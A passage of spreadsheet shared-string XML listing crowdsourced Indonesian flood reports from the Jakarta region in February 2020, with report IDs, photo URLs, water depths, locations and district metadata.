    <t>https://images.petabencana.id/3104c10b-c2eb-4911-98a2-cfe566e2a8fc.jpg</t>
  </si>
  <si>
    <t>Banjir sedalam +- 35cm, di wilayah Halim Perdana Kusuma GG Seruni RT 001 RW 01 ( Dekat Musholah Al Barokah )</t>
  </si>
  <si>
    <t>080c3dba-f855-45ea-b3f7-0e4688ca1a6d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/080c3dba-f855-45ea-b3f7-0e4688ca1a6d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1903", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tipala, Makasar banjir &gt;40cm</t>
  </si>
  <si>
    <t>e98a660f-ff0a-4327-a96d-a053425c489c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e98a660f-ff0a-4327-a96d-a053425c489c.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 72, "report_type": "flood" }</t>
  </si>
  <si>
    <t>67c30f18-615f-49a3-b2dd-d2884b5d8016</t>
  </si>
  <si>
    <t>https://images.petabencana.id/67c30f18-615f-49a3-b2dd-d2884b5d8016.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2538", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>d013df08-a4d3-4f29-b076-d9a425519a87</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 83, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir sedengkul orang dewasa</t>
  </si>
  <si>
    <t>cc95908f-822d-42a9-9274-7fcee6ebd2c0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cc95908f-822d-42a9-9274-7fcee6ebd2c0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2509", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Jl Hybrida Raya Kelapa Gading ketinggian air sedengkul orang dewasa. Belum surut dari pk 2 dini hari</t>
  </si>
  <si>
    <t>22183437-ddcd-46d6-ad95-11ce9c9becc4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/22183437-ddcd-46d6-ad95-11ce9c9becc4.jpg</t>
  </si>
  <si>
    <t>6614a297-dc1d-4059-beaf-ff4501a5aa4f</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 134 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1424", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sangat dalam dan arus sangat kencang</t>
  </si>
  <si>
    <t>155639c2-dbf9-4443-b609-74b5fe944d35</t>
  </si>
  <si>
    <t>https://images.petabencana.id/155639c2-dbf9-4443-b609-74b5fe944d35.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1045", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Itu jalan raya bekasinya</t>
  </si>
  <si>
    <t>1e66b5d2-2e9e-46c5-8227-55f45a5e0dcd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e66b5d2-2e9e-46c5-8227-55f45a5e0dcd.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2039", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>a7f63d4e-ae80-454e-99f2-04e33d75bd89</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7f63d4e-ae80-454e-99f2-04e33d75bd89.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 107 }</t>
  </si>
  <si>
    <t>Banjir rendam Harapan Indah. Jl. Kemuning Indah RT004 RW019. Pejuang Medan Satria. 17131"</t>
  </si>
  <si>
    <t>317793b5-c474-4b0d-96f0-8312689b0d61</t>
  </si>
  <si>
    <t>https://images.petabencana.id/317793b5-c474-4b0d-96f0-8312689b0d61.jpg</t>
  </si>
  <si>
    <t>Banjir di gading Elok timur 4 per  tgl 23 Feb 2020 pagi 7-9am</t>
  </si>
  <si>
    <t>c9997981-91d9-4cb4-820d-afd3d888cda5</t>
  </si>
  <si>
    <t>Banjir setinggi lutut di Komplek Pulo Gebang Permai Blok H</t>
  </si>
  <si>
    <t>418a6fbf-bb21-4d24-9523-b4dd4627b83e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/418a6fbf-bb21-4d24-9523-b4dd4627b83e.jpg</t>
  </si>
  <si>
    <t>Persimpangan Boulevard Raya - Kayu Putih Raya</t>
  </si>
  <si>
    <t>c4f69529-d871-40a4-bd03-5187a354dd18</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c4f69529-d871-40a4-bd03-5187a354dd18.jpg</t>
  </si>
  <si>
    <t>banjir sejak jam 4 pagi tadi setinggi paha orang dewasa</t>
  </si>
  <si>
    <t>5378c081-5936-4d81-b80a-5d4d753bcfb2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5378c081-5936-4d81-b80a-5d4d753bcfb2.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 57, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Dari arah artha gading-itc</t>
  </si>
  <si>
    <t>f39cbc88-09c1-446a-8c7c-0837967267e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f39cbc88-09c1-446a-8c7c-0837967267e1.jpg</t>
  </si>
  <si>
    <t>Banjir sepanjang pintu masuk Yarsi</t>
  </si>
  <si>
    <t>faf5fe7a-4888-4816-ac56-4efc5344f7de</t>
  </si>
  <si>
    <t>https://images.petabencana.id/faf5fe7a-4888-4816-ac56-4efc5344f7de.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1888", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air kurang lebih tingginya 43-45 cm</t>
  </si>
  <si>
    <t>66868917-38a9-4215-a734-ecde116594d1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/66868917-38a9-4215-a734-ecde116594d1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1660", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir, di daerah kramat jati rt 01 rw 01 kel. Rambutan kec. Ciracas jakarta timur</t>
  </si>
  <si>
    <t>Rambutan</t>
  </si>
  <si>
    <t>cd0905f2-505a-4e80-a377-93be6333d2b7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cd0905f2-505a-4e80-a377-93be6333d2b7.jpg</t>
  </si>
  <si>
    <t>Air semakin tinggi sejak subuh 23/2/2020</t>
  </si>
  <si>
    <t>c58ea8ef-4e6f-4410-afd2-a6be1fc656d2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c58ea8ef-4e6f-4410-afd2-a6be1fc656d2.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2198", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>5be87aa6-fe00-48d0-b20d-1feec2b461e9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5be87aa6-fe00-48d0-b20d-1feec2b461e9.jpg</t>
  </si>
  <si>
    <t>4b0d7d5b-253d-4e0d-97e6-86a6084decfa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b0d7d5b-253d-4e0d-97e6-86a6084decfa.jpg</t>
  </si>
  <si>
    <t>Dari jam 2 belum surut</t>
  </si>
  <si>
    <t>3191a0cd-13cf-4f0c-9216-94e4450de830</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3191a0cd-13cf-4f0c-9216-94e4450de830.jpg</t>
  </si>
  <si>
    <t>11f58f30-9c75-4d71-9341-b757cfffda6b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11f58f30-9c75-4d71-9341-b757cfffda6b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1657", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sudah mulai surut. foto fiambil pukul 6.20 pagi</t>
  </si>
  <si>
    <t>5b004522-1900-452b-88fe-6bf08627208f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5b004522-1900-452b-88fe-6bf08627208f.jpg</t>
  </si>
  <si>
    <t>Banjir dari hujan semalam dan kiriman dari depok. Tolong ditindak lanjuti</t>
  </si>
  <si>
    <t>d801ec28-c897-46df-a106-46932b7b34f6</t>
  </si>
  <si>
    <t>air bertambah naik, padahal PA Sunter siaga 4.</t>
  </si>
  <si>
    <t>917b3844-b236-4109-bea8-58573458f99f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/917b3844-b236-4109-bea8-58573458f99f.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2119", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>1da63807-411e-499a-afc9-5bf22b45e0be</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "626", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sumur Batu masih tergenang dan listrik padam</t>
  </si>
  <si>
    <t>Sumur Batu</t>
  </si>
  <si>
    <t>aee27819-7c95-44b6-93b9-c232f1ea8197</t>
  </si>
  <si>
    <t>Banjir di semua jalan tambun rengas</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349438</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/23/349438-15824288201846430180.mp4-03.jpg</t>
  </si>
  <si>
    <t>Kawasan Kelapa Gading Pagi Ini Tergenang Air Hingga 15 Cm</t>
  </si>
  <si>
    <t>Jalan Camar Pengangsaan Dua Kelapa Gading pagi ini banjir mencapai 15 cm.</t>
  </si>
  <si>
    <t>f642f1e3-316c-4d1c-b905-1a725f11e4b3</t>
  </si>
  <si>
    <t>92919cab-01f8-4d78-bb6b-a0a5105dbd10</t>
  </si>
  <si>
    <t>https://images.petabencana.id/92919cab-01f8-4d78-bb6b-a0a5105dbd10.jpg</t>
  </si>
  <si>
    <t>Air mulai masuk jam 2 pagi, sampai siang masih blm surut. Ada bayi, ada ibu hamil, ada lansia.</t>
  </si>
  <si>
    <t>bcefa733-d6b5-4f78-ab01-3340e036b9a9</t>
  </si>
  <si>
    <t>di depan bizpark penggilingan, sama pool bluebird penggilingan banjir</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349442</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/23/349442-1582429674241363309.mp4-03.jpg</t>
  </si>
  <si>
    <t>Banyak Motor Mogok Akibat Terobos Banjir di Kelapa Gading</t>
  </si>
  <si>
    <t>Terobosan Banjir , Banyak Motor Mogok di jalan Pengangsaan dua Kelapa Gading.</t>
  </si>
  <si>
    <t>1716074b-bb66-43e0-9e9b-5f684a1285ca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1716074b-bb66-43e0-9e9b-5f684a1285ca.jpg</t>
  </si>
  <si>
    <t>banjir setiap hujan</t>
  </si>
  <si>
    <t>3e6c586e-df32-415b-8ad5-88b7d9e91c3e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3e6c586e-df32-415b-8ad5-88b7d9e91c3e.jpg</t>
  </si>
  <si>
    <t>Pokoknya banjir</t>
  </si>
  <si>
    <t>8c0cc591-bd7a-488f-b74a-36253e54b35c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c0cc591-bd7a-488f-b74a-36253e54b35c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1865", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sdh mulai surut</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349443</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/23/349443-15824302631138703378.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2521", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tak Takut Mogok, Fortuner Ini Nekat Terobos Genangan Banjir</t>
  </si>
  <si>
    <t>Seperti tak takut mogok, terlihat Mobil Fortuner Nekat Melintas di Genangan Banjir Pengangsaan Dua.</t>
  </si>
  <si>
    <t>0c46c807-cdac-40da-95a0-88cad7b5ebbc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0c46c807-cdac-40da-95a0-88cad7b5ebbc.jpg</t>
  </si>
  <si>
    <t>Banjir sebrang MOI</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349446</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/23/349446-15824317691964424426.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2507", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kawasan Industri Pulo Gadung Langganan Banjir Saat Hujan</t>
  </si>
  <si>
    <t>Kawasan industri Pulo gadung Tak Luput Dari Banjir.</t>
  </si>
  <si>
    <t>32901a0f-f2f8-4599-a88b-77cc0b1f9a6d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32901a0f-f2f8-4599-a88b-77cc0b1f9a6d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1930", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jam 5.30 tgl 23 feb 2020</t>
  </si>
  <si>
    <t>a3549b36-b7c1-40a7-bf54-20df220b7219</t>
  </si>
  <si>
    <t>Banjir setinggi antara betis dan mata kaki orang dewasa</t>
  </si>
  <si>
    <t>a0c8b206-36ac-432e-9e63-e6c6c8221937</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a0c8b206-36ac-432e-9e63-e6c6c8221937.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1742", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air dpn Rumah 35-30cm, di dlm rmh sekitar 20cm</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349448</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/23/349448-1582433277940223350.mp4-03.jpg</t>
  </si>
  <si>
    <t>Banjir Menggenangi Ruas Jl Letjen Suprapto Sampai Saat Ini</t>
  </si>
  <si>
    <t>Terlihat Banjir yang cukup dalam menggenangi ruas jalan Letjen Suprapto yg menuju Senen dan Pulogadung hingga saat ini.</t>
  </si>
  <si>
    <t>1e77e350-c532-4a3e-a8ca-4c408dcfc4e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e77e350-c532-4a3e-a8ca-4c408dcfc4e8.jpg</t>
  </si>
  <si>
    <t>Genangan Air sekitar 20 cm</t>
  </si>
  <si>
    <t>96dc6e76-420c-4143-b0b5-765f116f4e7f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/96dc6e76-420c-4143-b0b5-765f116f4e7f.jpg</t>
  </si>
  <si>
    <t>Banjir kedua di 2020</t>
  </si>
  <si>
    <t>9cf161ea-cd9a-4082-8dee-bf99c9735c6f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9cf161ea-cd9a-4082-8dee-bf99c9735c6f.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 104, "report_type": "flood" }</t>
  </si>
  <si>
    <t>a6cccccb-e0d1-4213-baed-7f2ac4a4078a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a6cccccb-e0d1-4213-baed-7f2ac4a4078a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "225", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sepanjang komplek cempaka putih barat pinggir kali</t>
  </si>
  <si>
    <t>a5ea0e05-060a-4988-a79a-7de176ebb22c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a5ea0e05-060a-4988-a79a-7de176ebb22c.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan gading griya lestari blok c1 rw 12 setinggi krg lbh 80 cm.</t>
  </si>
  <si>
    <t>4d8d7ca8-4f6b-4620-93e5-01ecfe5c24f6</t>
  </si>
  <si>
    <t>Banjir di perumahan green garden, kelurahan rorotan, kecamatan cilincing. Akses keluar utk mengungsi sulit. Blm ada perahu karet.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349450</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/23/349450-1582435756747631932.mp4-03.jpg</t>
  </si>
  <si>
    <t>Perumahan di Cempaka Putih Banjir Imbas Hujan Semalaman</t>
  </si>
  <si>
    <t>Perumahan Cempaka Putih juga terendam banjir imbas diguyur hujan semalaman.</t>
  </si>
  <si>
    <t>c5b119b4-4170-4793-8411-9f9e7c1a1376</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5b119b4-4170-4793-8411-9f9e7c1a1376.jpg</t>
  </si>
  <si>
    <t>Lapangan Mesjid Al Hidayah, jl Tari Baluse, Kelapa Gading</t>
  </si>
  <si>
    <t>82bacdf0-a4a3-4316-ad40-6a0f22b5cb31</t>
  </si>
  <si>
    <t>Jalan Gading Putih Raya sampai jalan boulevard</t>
  </si>
  <si>
    <t>78859e8c-a2b0-4324-9da2-ac7ec9383a73</t>
  </si>
  <si>
    <t>https://images.petabencana.id/78859e8c-a2b0-4324-9da2-ac7ec9383a73.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1191", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir sepinggang di jalan putri</t>
  </si>
  <si>
    <t>7aeac1ca-ed6d-46d9-9ef6-bf999fecc799</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7aeac1ca-ed6d-46d9-9ef6-bf999fecc799.jpg</t>
  </si>
  <si>
    <t>sampai siang ini pukul 13.15 belum surut</t>
  </si>
  <si>
    <t>8407aa16-f08e-4f3b-a8ec-c03e16f00f15</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8407aa16-f08e-4f3b-a8ec-c03e16f00f15.jpg</t>
  </si>
  <si>
    <t>Tolong pompa nya diaktif kan agar segera surut</t>
  </si>
  <si>
    <t>223316e8-4677-47e7-a72c-67b24114fe16</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 177 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "306", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ntol</t>
  </si>
  <si>
    <t>0680889e-e828-423b-be68-d979c63b4581</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0680889e-e828-423b-be68-d979c63b4581.jpg</t>
  </si>
  <si>
    <t>Kurang lebih sepaha orang dewasa</t>
  </si>
  <si>
    <t>a9dd0f98-d626-475c-947f-92e1f793cedd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9dd0f98-d626-475c-947f-92e1f793cedd.jpg</t>
  </si>
  <si>
    <t>Ini dalam rumah, luarrumah lebih dalam lagi</t>
  </si>
  <si>
    <t>0bca5799-65d5-4881-b27f-2d94e1bb2186</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0bca5799-65d5-4881-b27f-2d94e1bb2186.jpg</t>
  </si>
  <si>
    <t>Banjir masuk kerumah warga</t>
  </si>
  <si>
    <t>49ed9f80-a008-41c1-8b22-cacddf0f89f6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/49ed9f80-a008-41c1-8b22-cacddf0f89f6.jpg</t>
  </si>
  <si>
    <t>Banjir di perum Rajeg Rajawali Residence, Kel. Rajeg, Tangerang</t>
  </si>
  <si>
    <t>Rajeg</t>
  </si>
  <si>
    <t>39ff0f3a-2236-461d-84b8-1255aed7cfa2</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 100, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir se-pinggang</t>
  </si>
  <si>
    <t>2bac76c3-5510-47a6-a1f3-5f313e5f047e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2bac76c3-5510-47a6-a1f3-5f313e5f047e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2353", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir selutut lebih orang dewasa</t>
  </si>
  <si>
    <t>09d36834-bda9-43ad-8ed4-e84b93747ad0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09d36834-bda9-43ad-8ed4-e84b93747ad0.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan gading griya lestari/residence dgn kedalaman 30-70cm. Dari tadi pagi belum juga surut</t>
  </si>
  <si>
    <t>04d6f330-8199-4223-ab4c-c7b890a96a8f</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1606", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sekitar masih 50 cm di jalan kelapa cengkir barat 1</t>
  </si>
  <si>
    <t>6eeccbf9-f15a-4d4b-af97-6b7fad1af9cf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6eeccbf9-f15a-4d4b-af97-6b7fad1af9cf.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2359", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>3590dc09-e396-40a4-a9ee-b7434028ee61</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3590dc09-e396-40a4-a9ee-b7434028ee61.jpg</t>
  </si>
  <si>
    <t>Komplek janur elok banjir dan air tidak surut seharian. Stagnant selutut-sepaha orang dewasa</t>
  </si>
  <si>
    <t>f3bcc710-01cb-44d4-b23f-c63fbf8f44bd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f3bcc710-01cb-44d4-b23f-c63fbf8f44bd.jpg</t>
  </si>
  <si>
    <t>Cakung lumpuh total</t>
  </si>
  <si>
    <t>acf5faf8-25ce-48f2-8c37-89490267b0bd</t>
  </si>
  <si>
    <t>Villa mutiara gading blok g banjir sebetis</t>
  </si>
  <si>
    <t>1ea781a1-ecbf-4897-a06c-9560f1d7924e</t>
  </si>
  <si>
    <t>belakang gereja bonaventura</t>
  </si>
  <si>
    <t>e4206aa6-5d5a-4c23-8adc-4a2dfed2ad33</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e4206aa6-5d5a-4c23-8adc-4a2dfed2ad33.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2141", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>kondisi genangan yg bisa difoto, tidak berani di tempat yang dalam</t>
  </si>
  <si>
    <t>b76cfec6-2ea3-40da-91bb-59fe7794d59e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b76cfec6-2ea3-40da-91bb-59fe7794d59e.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 41, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2690", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sejak pagi yang kian naik padahal tidak terjadi hujan</t>
  </si>
  <si>
    <t>84eb358e-11eb-4dcc-ac6b-87f3c2ed6976</t>
  </si>
  <si>
    <t>banjir sampai di atas lutut</t>
  </si>
  <si>
    <t>217512b6-8b54-4ee4-bd8a-2ad03b5af985</t>
  </si>
  <si>
    <t>https://images.petabencana.id/217512b6-8b54-4ee4-bd8a-2ad03b5af985.jpg</t>
  </si>
  <si>
    <t>Banjir lagi dari subuh</t>
  </si>
  <si>
    <t>70a475d5-06ca-4038-b53f-518f74157a3b</t>
  </si>
  <si>
    <t>PLN masih mati. Banjir belum surut</t>
  </si>
  <si>
    <t>0a068931-9d88-47eb-81f0-d2edbc923a7f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0a068931-9d88-47eb-81f0-d2edbc923a7f.jpg</t>
  </si>
  <si>
    <t>#banjir kelapa gading jakarta utara..</t>
  </si>
  <si>
    <t>ab48af60-60c5-461d-8a38-c6457e536969</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ab48af60-60c5-461d-8a38-c6457e536969.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2656", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Dari PAgi hingga jam 21:22</t>
  </si>
  <si>
    <t>47e07f79-3f70-456e-83d1-8b952dc0bc57</t>
  </si>
  <si>
    <t>Tolong segera di tangani banjir di daerah kami</t>
  </si>
  <si>
    <t>27caad14-c76b-44fd-ae04-c607f1edf1a5</t>
  </si>
  <si>
    <t>Langganan banjir euy</t>
  </si>
  <si>
    <t>48cce481-8ad8-4149-847c-614b9db46d6b</t>
  </si>
  <si>
    <t>X</t>
  </si>
  <si>
    <t>8cd201e7-a164-4a57-aeed-d1e4665b4ef5</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 29, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2238", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kampung tugu  rw 12</t>
  </si>
  <si>
    <t>8057db65-879e-4a61-8eac-69da896281b0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8057db65-879e-4a61-8eac-69da896281b0.jpg</t>
  </si>
  <si>
    <t>Mekar Indah, Jababeka, Cikarang Baru</t>
  </si>
  <si>
    <t>2ffdb591-a6d3-43c0-bdcd-e58f53e071fa</t>
  </si>
  <si>
    <t>tiapa malam hujan deras beserta angin kenceng</t>
  </si>
  <si>
    <t>fd8afaa4-68b6-4d6b-b306-78cd240875d9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fd8afaa4-68b6-4d6b-b306-78cd240875d9.jpg</t>
  </si>
  <si>
    <t>banjir diperkirakan mulai pukul 3.45 pagi. jl. kedasih 1 mulai memasuki rumah warga"</t>
  </si>
  <si>
    <t>18bf99b2-0a38-4a51-b26a-885d15dd9a09</t>
  </si>
  <si>
    <t>69782b1d-cb54-48da-a147-37660796ef4c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/69782b1d-cb54-48da-a147-37660796ef4c.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 47, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Welahan jepara jl.buyut surgi #sarjepara</t>
  </si>
  <si>
    <t>Bugo</t>
  </si>
  <si>
    <t>Welahan</t>
  </si>
  <si>
    <t>c9435a9c-55f3-4285-b835-6674fc3a2729</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c9435a9c-55f3-4285-b835-6674fc3a2729.jpg</t>
  </si>
  <si>
    <t>Pasar Bojong Tarumajaya</t>
  </si>
  <si>
    <t>b04d8907-1d70-4c51-9a42-5c17c4ba2e2e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b04d8907-1d70-4c51-9a42-5c17c4ba2e2e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2188", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Malaka 1 gang 2  Rt 003 Rw 011 Kelurahan Rorotan Kecamatan Cilincing Jakarta Utara</t>
  </si>
  <si>
    <t>3544ccfd-4471-4b09-94fb-35afbc1ef292</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3544ccfd-4471-4b09-94fb-35afbc1ef292.jpg</t>
  </si>
  <si>
    <t>Banjir di desa welahan gedangan rt 01 rw 02 #sarjepara</t>
  </si>
  <si>
    <t>48c511e7-f3ef-4f28-84a1-76eb6740b826</t>
  </si>
  <si>
    <t>https://images.petabencana.id/48c511e7-f3ef-4f28-84a1-76eb6740b826.jpg</t>
  </si>
  <si>
    <t>Jl gedangan ruko rajawali rt 01 rw 02 #sarjepara</t>
  </si>
  <si>
    <t>cbedd3bd-5d4d-4d96-b151-918f0978c655</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cbedd3bd-5d4d-4d96-b151-918f0978c655.jpg</t>
  </si>
  <si>
    <t>Jln depan pabrik jarum welahan gedangan rt  01 rw 02 #sarjepara</t>
  </si>
  <si>
    <t>22557617-361a-4098-8f85-fee4a80e1505</t>
  </si>
  <si>
    <t>https://images.petabencana.id/22557617-361a-4098-8f85-fee4a80e1505.jpg</t>
  </si>
  <si>
    <t>Banjir Jln gedangan rt 01 rw 02 #sarjepara</t>
  </si>
  <si>
    <t>4be219d6-6499-4bbc-bd2d-a1b4f66a7e2f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4be219d6-6499-4bbc-bd2d-a1b4f66a7e2f.jpg</t>
  </si>
  <si>
    <t>Desa karang ligar kec. Telukjambe barat kab Karawang</t>
  </si>
  <si>
    <t>Karangligar</t>
  </si>
  <si>
    <t>Telukjambe Barat</t>
  </si>
  <si>
    <t>Karawang</t>
  </si>
  <si>
    <t>4b821a89-07ee-4535-987a-86e5813b1d7d</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 191 }</t>
  </si>
  <si>
    <t>Kampung Kobakceper 1. RT. 006/002 10 KK 10 Rumah 2. RT. 007/003 120 KK 80 Rmh 3. RT. 008/003 130 KK 120 Rmh IRBOX Assessment Div"</t>
  </si>
  <si>
    <t>Karangraharja</t>
  </si>
  <si>
    <t>e15f3627-ce23-4ca6-bc42-e039f548ab19</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e15f3627-ce23-4ca6-bc42-e039f548ab19.jpg</t>
  </si>
  <si>
    <t>Banjir Wilayah Binong Permai Blok i RT.004/RW.014</t>
  </si>
  <si>
    <t>Suka Bakti</t>
  </si>
  <si>
    <t>Curug</t>
  </si>
  <si>
    <t>00dcd3bf-d491-4dd3-aafb-268c5de0fd73</t>
  </si>
  <si>
    <t>https://images.petabencana.id/00dcd3bf-d491-4dd3-aafb-268c5de0fd73.jpg</t>
  </si>
  <si>
